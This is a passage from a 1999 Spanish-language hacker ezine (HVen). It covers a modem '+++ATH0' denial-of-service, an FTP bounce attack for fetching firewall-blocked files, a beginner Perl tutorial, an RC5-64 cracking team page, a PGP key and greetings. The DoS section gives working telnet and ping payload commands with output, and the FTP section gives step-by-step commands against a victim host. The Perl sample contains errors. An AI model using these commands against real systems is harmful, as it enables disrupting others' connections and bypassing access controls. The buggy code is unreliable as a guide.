  probar. Pero gracias a Supreme ya se que los modems Sierra 33.6 no son
  vulnerables :) (toda prueba echa con su consentimiento, claro). Debido
  a la escasez de modems vulnerables (no es  que sean muy pocos sino que
  da la casualidad de que nadie que  estaba en IRC en ese  momento tenia
  uno vulnerable) tome unos ejemplos de los advisories de bugtraq.
 
  Un ejemplo de posible ataque:

 [~] $ telnet xxx.xxx.xxx.xxx 21
Trying xxx.xxx.xxx.xxx ...
Connected to 192.168.1.1.
Escape character is '^]'.
220 foo FTP server (Version wo [Beta 31337] (1) Mon Jul 19
20:41:
USER +++ATH0
^]
telnet> close
Connection closed.

  Ahora probamos si sigue online:

 [~] $ telnet xxx.xxx.xxx.xxx 21
Trying xxx.xxx.xxx.xxx...
telnet: Unable to connect to remote host: Network is unreachable
 [~] $

  Ahora utilizando el ping attack (tomado como ejemplo de Bugtraq):

[root@narf ]# ping -p 2b2b2b415448300d -c 5 xxx.xxx.xxx.xxx
PATTERN: 0x2b2b2b415448300d
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx): 56 data bytes

--- xxx.xxx.xxx.xxx ping statistics ---
5 packets transmitted, 0 packets received, 100% packet loss
[root@narf ath0]#

  El -c 5 es un switch para que pare de mandar y recibir los paquetes de
  respuesta, en este caso 5. Es como un modo de mandar 5 packets... solo
  para estar seguros,jejeje.

  En los statistics se ve que la v�ctima no respondi� a ning�n paquete..
  o sea que llego e hizo su efecto!

  Si el bug no funciona obtendriamos esto:

[root@narf ath0]# ping -p 2b2b2b415448300d -c 5 xxx.xxx.xxx.xxx
PATTERN: 0x2b2b2b415448300d
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx): 56 data bytes
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=0 ttl=252 time=182.4 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=1 ttl=252 time=190.1 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=2 ttl=252 time=190.1 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3 ttl=252 time=190.1 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=4 ttl=252 time=180.1 ms

--- xxx.xxx.xxx.xxx ping statistics ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 180.1/186.5/190.1 ms
[root@narf ath0]#

  En los statistics se ve que la m�quina  respondi� a todos los packets.
  No funcion�.

  Y utilizando el comando de IRC no obtuve  ning�n resultado. Si alguien
  logra que funcione por favor mandeme un email.

  Por lo visto tambi�n se puede  lograr el DoS con solo  mandar un email
  con el +++ATH0 el mail se colgaba. No estoy seguro de esto. Si alguien
  logra que funcione avisenme.

  En PacketStorm (http://packetstorm.securify.com) tambi�n se  encuentra
  un programita en C. Al final del art�culo se  encuentra  el  source de
  gin.c

=================================>ARREGLO<==============================

  Bueno  lo  esencial  aqu� es o cambiar  el escape  character  al  algo
  diferente  que  no  sea +++ o prevenir  que el modem  entre en modo de
  comando. El arreglo mas f�cil que hay es este:

ping -c 1 -p 2b2b2b415453323d32353526574f310d host

  Esto lo que  hace es cambiar  el escape character remotamente, lo cual
  se logra mediante el comando

+++ATS2=255&WO1

  Tambi�n  manda  el comando 01 que se  supone  que evita  que el  modem
  entre en command mode. Esto a veces ocasiona que el modem se "cuelgue"
  pero arregla el problema.

 ===============================================
||                TiT0_C                      ||
||                                            ||
||  PGP Key ID: 0x6DD1A00F                    ||
||  ICQ#:9288616                              ||
||                                            ||
|| Error de Windows #934:Su teclado no        ||
|| funciona.Presione F5 para continuar.       ||
||                                            ||
===============================================

   ���������������ͻ
��͹ Bounce Attack �����������������������������������͹Teken Melocotoff������
   ���������������ͼ

  Bounce attack, o ataque  de rebote  es una t�cnica  que  en  teor�a es
  simple,  pero  en  su  aplicaci�n   puede  ser   bastante  complicada,
  dependiendo  de  lo que se quiere hacer. En su procedimiento se parece
  mucho  a la  utilizaci�n de un wingate/proxy/condom pero  las  sutiles
  diferencias son los importante lo suficiente para diferenciar.

  Ir� desde un ejemplo b�sico, y un ejemplo intermedio...

        B�sico
        ------
  Tas en la u, y quieres  acceder a hotmail. Pones la dire  de  hotmail,
  pero cuando  pones el pass y login y tratas  de ingresar, nada. Que es
  lo que pasa? Que el firewall de tu uni tiene un deny contra esa pagina
  o alg�n procedimiento o llamada que hace esa pagina. Que hacer?

  Pues muchos saben que  hotmail es  parte  de Mocosoft, y en el site de
  mocosoft tiene un espacio para el login y pass para hotmail.

  Vas ah�, y haces tu login y pass, y Zasss estas in. Por qu�?
  Porque  para el  firewall, solo aparecer�  que est�s trabajando con la
  p�gina  de msn.  Cuando  metes  tu login/pass, las  llamadas  que hace
  hotmail   van  a  msn,  y  no  pasan  por  tu  m�quina.  De  ah�,  msn
  obedientemente  manda  las  p�ginas  de hotmail una vez accedidas a tu
  m�quina (as� es como accedo hotmail desde la uni).

  Osea, est�s  insertando  un  comando  en una m�quina, este lo procesa,
  y lo manda a su destino. El destino  manda a la  m�quina  de en medio,
  esta procesa o lo que tenga que hacer, y los resultados van a ti, o tu
  a el, dependiendo. Aqui  yace la diferencia  entre los proxies, en que
  no tienes que necesariamente estar  conectado o ingresar a la m�quina.
  Esta hace aparentar como si los comandos procedieran de ella.

  Avanzando  el  nivel  de la t�cnica, se puede  hacer lo mismo con irc,
  fakemail, cualquier proceso  que tengas que hacer input a una m�quina.
  El ejemplo cl�sico es el Ftp bounce.
  (LINUX/UNIX MODE ON)credits a 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

  Supon que quieres archivos de una  m�quina=a, pero  tu  domino=c tiene
  deny. Tu conoces de una maquina=b de la red en la que si puede acceder
  y esta tiene  un  directorio  donde puedas  escribir.  Pues  f�cil. Tu
  m�quina  antes  que  todo  debe  ser  habilitada  para  funcionar como
  servidor ftp y que pueda correr con opci�n de modo pasv

  1. Entra en  una sesi�n  Ftp en tu propia m�quina  con su IP (no local
     host)

  2. quote "pasv" quote  "stor archivo" El comando te dar�  un address y
     un puerto, ap�ntalos. El ftp estar� esperando el archivo a recojer,
     as� que estar� en background. Abre un editor de texto (Emacs Roxs!)

  3. Construye un archivo que  contenga  los  comandos  que  quieras que
     haga el

      server. ejemplo:
      user ftp
      pass -anonymous@
      cwd /directorio-de-el.archivo-deseado
      type i  port address y port que regreso el pasv
      retr archivo_deseado
      quit
         ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
         ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@ ...
      EOF

  ^@=son  s�mbolos  que  representan null. Tienen que ser 250, y esto es
  para  asegurase  que  la  conexi�n no  se corte antes de tiempo. Si lo
  intentan sin los nulls no podr�n bajar los archivos.

  4. Haz ftp a la  m�quina  en que si puedes  escribir y sabes que tiene
     permiso  para  bajar  archivos,  y  ve  al  directorio donde puedas
     escribir.

  5. Sube el archivo "put archivo".

  6. quote port "IP.de.la.victima,0,21" <-- el 21 es el puerto para ftp.

  7. quote "retr archivo" <--- har�  que se corra el archivo que subiste
     al servidor.

  Ahora  la  m�quina  B le  dira a A "m�ndame el archivo". Como B  tiene
  permiso de bajar el archivo, A obedientemente  lo manda. B luego sigue
  la otra instrucci�n  que le  dice que te lo mande a ti. Como no tienes
  deny  a B, B te  manda  el  archivo.  Viola,  haz  bajado  un  archivo
  prohibido para tu domino.

  Esta misma t�cnica se puede utilizar para cualquier otro procedimiento
  en cual  se  quiera mandar/subir comandos/informaci�n de una m�quina a
  la otra, y no  necesariamente  por los puertos tradicionales. Ejemplos
  ser�an irc bombing, fakemail, news, etc.

                  |==========================================|
                  |            Teken Melocotoff              |
                  |Escojamos. Seremos lobo, pastor, u oveja. |
                  |            www.hven.com.ve               |
                  |        public.cwp.net.pa/~jomasa         |
                  |==========================================|

   �����������������������ͻ
��͹ Programacion en Linux ������������������������������������͹DoctorX������
   �����������������������ͼ

  Para nadie es un secreto que para un Hacker, Linux aparte de ser un S0
  muy estable es una poderosa herramienta para el hacking, pero �de  que
  nos  sirve  tener  la  herramienta  si no sabemos como utilizarla o no
  sabemos  como   aprovechar  todas  sus   potencialidades?.  Para  ello
  utilizaremos un lenguaje de programaci�n muy versatil llamado Perl.

        Declaraci�n de Variables
        ------------------------
  En perl  las variables son declaradas simplemente utilizando un $, sin
  importar el tipo de  variable que es si es string o num�rica para perl
  son  simplemente variables y uno como programador no se debe preocupar
  por el tipo de variables si no por que hacer con ellas.

  ejm:
$loco = 10 ; 

  Le asigna a la variable $loco el valor 10.

$BAN = "LabX - HVen - Venezuela\n" ;

  le asigna a la variable $BAN el string "LabX - HVen - Venezuela "
  notese que las l�neas del programa deben terminar en ";"

        Incremento de Variables
        -----------------------

  En la ejecuci�n de un programa muchas  veces queremos llevar la cuenta
  de un evento y para ello se utilizan los  incrementos o decrementos de
  variables num�ricas.

++NOMBRE_VARIABLE incrementa
--NOMBRE_VARIABLE decrementa

  ejm:
#!/usr/bin/perl
$loco = 20 ;
if (loco < 10) {
--$loco ; }
else
{ ++$loco; }
endif ;
print $loco ;

  En este  ejemplo  se le asigna  el valor  de 20 a  la variable $loco y
  luego   se  incrementa  o  decrementa   dependiendo  de  la  condici�n
  establecida en el IF  en este caso al final la variable loco tendra un
  valor  de  21  y  el mismo ser�  mostrado en  pantalla  al ejecutar el
  script.

        Arreglos
        --------

  Normalmente  un  arreglo  en  una serie de datos colocados en forma de
  vector o matriz los cuales vamos a utilizar durante la ejecuci�n de el
  programa y que necesitamos que est�n guardados.

  ejm:

@vector = ( "DoctorX" , "Biohazard" , "HVen" );

  De esta forma creamos un vector que contiene como elementos esos datos
  y si en un programa colocamos una linea como esta:

print $vector[1]; 

  dara como resultado
  DoctorX

  Y asi  sucesivamente, existe  otro tipo  de arreglos llamados hash que
  son los llamados arreglos asociativos o que tienen  para cada elemento
  un elemento  asociado como  por  ejemplo  asociar a la palabra HVen el
  string "www.hven.com.ve" para que cuando se busque el elemento HVen de
  como resultado www.hven.com.ve, esto por dar un ejemplo.

        Modulos de Perl
        ---------------

  Los  m�dulos de perl son una serie de funciones previamente realizadas
  para dar m�s  potencialidad  al lenguaje tal como lo son las librerias
  de C. Para incluir alg�n  m�dulo de  perl se debe  utilizar la palabra
  use acompa�ado del nombre del m�dulo.

  ejm:

use Shell;
use Socket;

  Esto debe colocarse en el encabezado de el programa y est�s incluyendo
  el  m�dulo  Shell  que  permite  ejecutar  comandos  del  shell en tus
  programas de perl de manera transparente, y el modulo de Socket que te
  permite  cargar  la libreria  socket.h de C como parte de tu programa.
  Algunos m�dulos son:

  Env: Que  permite  mantener  las  variables  del  shell en tu programa
       dentro  de  un  arreglo  llamado %ENV (el % significa  que  es un
       arreglo asociativo).

  Config: Este permite tener acceso a la informaci�n de configuraci�n de
          perl.

  Cwd: Obtiene el PATH del directorio en donde estas parado.

  Time: Permite calcular tiempos entre el local y el GMT.

  Sys: Sirve para obtener el hostname.

  Net::Ping: Se utiliza para saber si un host esta online.

  Net::Telnet: Telnet.

  Exporter: M�todo por defecto para importar modulos.

  DoctorX
  ------------------------------------------
  HVen - Seguridad - http://www.hven.com.ve
  Bactery - LabX  - http://bactery.8m.com
  ------------------------------------------
  comentarios enviarlos a 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
  flames enviarlos a /dev/null o /home/'whoami'

   ���������ͻ
��͹ RC5 DES �����������������������������������������������������͹HVEN������
   ���������ͼ

        Proyecto Bovine

  Actualmente se est� trabajando  en el algoritmo  RC5-64 bits que puede
  tomar  un par  de a�os  en ser  roto por  su extenci�n, este algoritmo
  fueron  creados  por  RSA LABS, esta  compa�ia  ofrece  un premio a la
  persona que  logre romper  su  algoritmo, el  premio actualmente es de
  .000 de los  cuales 6.000 son  destinados  a una  organizaci�n  sin
  fines de lucro, 2.000 son para distributed.net por haber creado la red
  de computadores y los clientes para romper el algoritmo, 1.000 para el
  equipo al cual pertenezca la  persona y finalmente los 1.000 restantes
  son para el usuario que di� con la clave correcta.

        �Que m�todo se usa para romper el algoritmo?

  Se utiliza el m�todo de fuerza bruta que es un m�todo muy lento porque
  su funcionamiento se basa en utilizar todas las claves  posibles hasta
  encontrar la correcta pero esto a la vez la hace infalible.

        �Como puede unirme a el proyecto bovine?

  Muy f�cil, solo  tienes  que  bajar un cliente, que no es m�s que  una
  aplicaci�n   que   correr�  en   background  y  que   se  conectar�  a
  distributed.net para bajar una serie de bloques  para probarlas con el
  algoritmo,  cuando  termine  con  los  bloques  locales se conectar� a
  distributed  envi�ndolos y pidiendo m�s  para repetir el  ciclo  hasta
  encontrar la clave correcta.

        �Donde bajo el cliente?

  http://n0cgi.distributed.net/cgi/select.cgi

        �Como lo configuro?

  Solo especifica la cantidad de buffers y ponle tu direccion de  correo
  (esta sera tu id en distributed.net), en el resto de las  opciones las
  default har�n el trabajo (a no ser que tengas necesidades especiales).

        �Como me uno al Team HVen?

  Bueno es bastante simple, luego de que tengas el cliente funcionando y
  ya hayas enviado bloques debes esperar 24 horas  para aparecer  en las
  estad�sticas   de  distributed,  luego   de  las  24  horas  busca  tu
  informaci�n en  distributed y pide  tu  password,  cuando  obtengas tu
  clave, busca el  Team Hven y haz  click en "i want to join this team",
  introduce tu e-mail y password, luego de esto ya est�s en el Team HVen
  y los bloques que mandes seran contados para Hven.

        Liga Interna

  Al  unirte a HVEN estar�s formando parte de la liga  interna de ezines
  en  espa�ol  la  cual  es  encabezada  por la  gente de SET y nosotros
  estamos  ubicados  en la �ltima posici�n :-/ por ahora... Pero  con tu
  ayuda podemos  seguir subiendo en el ranking, esperamos que  te unas a
  nuestro equipo =)

  Hasta el 13 de Diciembre de 1999 as� van...

Rank Equipo                 Primer Bloque  D�as Miembros Bloques procesados
1517 SET ezine RC5-64 Team  4-Nov-1998     406     35        729,088
1826 J.J.F. / HACKERS TEAM  1-Oct-1998     440     31        567,308
2018 Proyecto R RC5 Team    15-Dic-1998    365     16        496,386
3070 NetSearch RC5-64 Team  29-Dic-1998    351     18        242,011
3210 Hven                   15-Dic-1998    365     24        220,189





   �����������ͻ
��͹ Llave PGP ���������������������������������������������������������������
   �����������ͼ

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use 

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
IK1qF0ev
=262M
-----END PGP PUBLIC KEY BLOCK-----

   �����������ͻ
��͹ Despedida ����������������������������������������������͹DarKdEaTH������
   �����������ͼ

  Hasta aqu� lleg� este  nuestro  segundo  n�mero, que  personalmente me
  gust�  bastante  y  nunca  hubiera  podido  terminarlo  sin la inmensa
  colaboraci�n de individuos como el pana DoctorX, Teken  y  Kliber  por
  solo mencionar algunos nicks  aunque de m�s est�  decirlo que  todo el
  equipo de HVEN ha trabajado duro  para ustedes  que nos  leen, nuestro
  tercer n�mero estar�  listo para... jeje, no lo s�, pero de  seguro si
  sale :-P aunque la fecha en  que salga  puede variar  dr�sticamente si
  recibimos colaboraciones, pero recuerda  que el nivel debe  ser medio-
  alto, ahora  si me  despido  pidiendoles  que  se mantengan  en linea,  
  Saludos. Nos vemos por ah�.

                              <��[HVen Team]��>

  Saludos y agradecimientos  a  toda la comunidad under latina que sigue
  ah� a  pesar  de  todo, a Raregazz  quienes  han  aportado  tanto a la
  comunidad under, felicitaciones por su  resurrecci�n =), al  pana  Mr.
  Silence felicitaciones por su nuevo dominio, a  todos  los  que  hacen
  posible que el hack latino se mantenga y se supere...

Mr. Silence                     
Cyber Optik - HackHour          
Pata - RareGazz                 
Raza Mexicana                   
Mau - Zine-Store                
VanHackez                       
InET                            
Taker & Plaxius - Proyecto R    
otros que estrenan nuevo dominio, felicitaciones!!!
y a toda gente del HVEN TEAM
KaDiLaC, DitiemeF, HackVenger, Combel, ThunderByte y todos los dem�s!

����������������������������������������������������������������������������ͻ
�XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX�
�XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX�
�XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX�
�XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX� 
�XXXX      X      XXX      XXXXXXXX      XXX          XXX      XXXX      XXXX� 
�XXXXX    XXX    XXXXX    XXXXXXXXXX    XXXX    XXXXXXXXXX    XXXXXX    XXXXX� 
�XXXXX    XXX    XXXXXX    XXXXXXXX    XXXXX    XXXXXXXXXX       XXX    XXXXX�
�XXXXX           XXXXXXX    XXXXXX    XXXXXX        XXXXXX    X   XX    XXXXX� 
�XXXXX    XXX    XXXXXXXX    XXXX    XXXXXXX    XXXXXXXXXX    XXX  �    XXXXX� 
�XXXXX    XXX    XXXXXXXXX    XX    XXXXXXXX    XXXXXXXXXX    XXXXXX    XXXXX� 
�XXXX      X      XXXXXXXXXX      XXXXXXXXXX          XXX      XXXX      XXXX� 
�XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX� 
�XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX�  EZINE  �XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX�       
�XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX� 
�XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX���������������XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX�  
�XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX * * * * * * * XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX�  
�XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX���������������XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX�  
�XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX� 
�XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX�
�XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX�  
����������������������������������������������������������������������������ͼ